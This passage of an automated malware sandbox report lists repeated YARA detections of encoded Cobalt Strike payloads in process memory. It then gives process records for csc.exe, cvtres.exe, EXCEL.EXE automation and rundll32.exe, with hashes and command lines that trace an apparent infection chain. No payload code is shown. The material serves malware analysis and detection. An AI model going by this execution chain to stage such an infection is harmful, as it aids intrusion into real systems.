                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501243619.0000000006B54000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500112961.0000000006E27000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499962160.0000000006E3E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500328316.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568738886.0000000006E3C000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509561363.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507377946.0000000006041000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568792297.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499598965.0000000006E84000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504952600.000000000646C000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500604850.0000000006CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499944069.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504750760.00000000064EB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502123395.00000000068FF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499912534.0000000006E47000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500175997.0000000006E14000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506567409.0000000006230000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499654163.0000000006E77000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500392333.0000000006DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500656702.0000000006C3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500133947.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507760692.0000000005EF2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499706418.0000000006E6E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504345055.000000000656C000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499750187.0000000006E67000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499521324.0000000006E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508543817.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501697332.0000000006A21000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501200856.0000000006C04000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509127714.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500032754.0000000006E31000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.567918240.0000000006071000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502899282.0000000006741000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503663386.0000000006640000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500236769.0000000006E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507414149.0000000006071000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509264079.0000000005B78000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507996577.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499506056.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508112663.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499764114.0000000006E64000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500280490.0000000006DFE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507642082.0000000005F41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.567865973.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500590066.0000000006DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503439579.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502667836.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502479061.0000000006841000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507423559.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502365955.00000000067F3000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499804770.0000000006E61000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508327386.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508977198.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508083711.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507943546.0000000005E86000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500124456.0000000006E24000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499664750.0000000006E74000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507900626.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502171014.0000000006880000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501943577.0000000006902000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499900664.0000000006E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501775845.00000000069FF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507263765.000000000606A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505360761.00000000063EC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506426333.000000000626E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500371775.0000000006DEB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509507876.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568633989.0000000006E16000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500271247.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509762082.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568691207.0000000006E29000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507305461.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500574937.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500300611.0000000006DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500381322.0000000006DE8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499851554.0000000006E57000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568719259.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504543226.0000000006527000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.569049205.0000000006E9D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499716165.0000000006E6A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506765353.0000000006170000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506625375.00000000061EF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509636935.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508201854.0000000005DC2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501854915.0000000006980000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499572225.0000000006E8B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500537921.0000000006DCC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500290954.0000000006DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509363516.0000000005B41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499838198.0000000006E5A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499586408.0000000006E87000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509707518.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508774998.0000000005C75000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504055585.00000000065C0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508725411.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500355385.0000000006DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499979043.0000000006E3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568622396.0000000006E13000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500225710.0000000006E0E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506934087.00000000060F7000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506382622.00000000062DB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500146207.0000000006E1E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503951630.0000000006608000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500435591.0000000006DDC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500214700.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509015844.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499330598.0000000006CBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505281515.0000000006456000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508508228.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507143214.0000000006072000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509189150.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507585756.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501274310.0000000006AFF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508358895.0000000005D63000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508666437.0000000005CC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500854607.0000000006B80000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.498808453.0000000006D3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Target ID:26
                                                                                                                                                                            Start time:14:21:47
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline
                                                                                                                                                                            Imagebase:0x7ff638ba0000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:27
                                                                                                                                                                            Start time:14:21:47
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                            Imagebase:0x9c0000
                                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Target ID:28
                                                                                                                                                                            Start time:14:21:49
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"
                                                                                                                                                                            Imagebase:0xc60000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                                                                            Target ID:30
                                                                                                                                                                            Start time:14:21:57
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                            Commandline:C:\Windows\\SysWOW64\\rundll32.exe
                                                                                                                                                                            Imagebase:
                                                                                                                                                                            File size:61952 bytes
                                                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
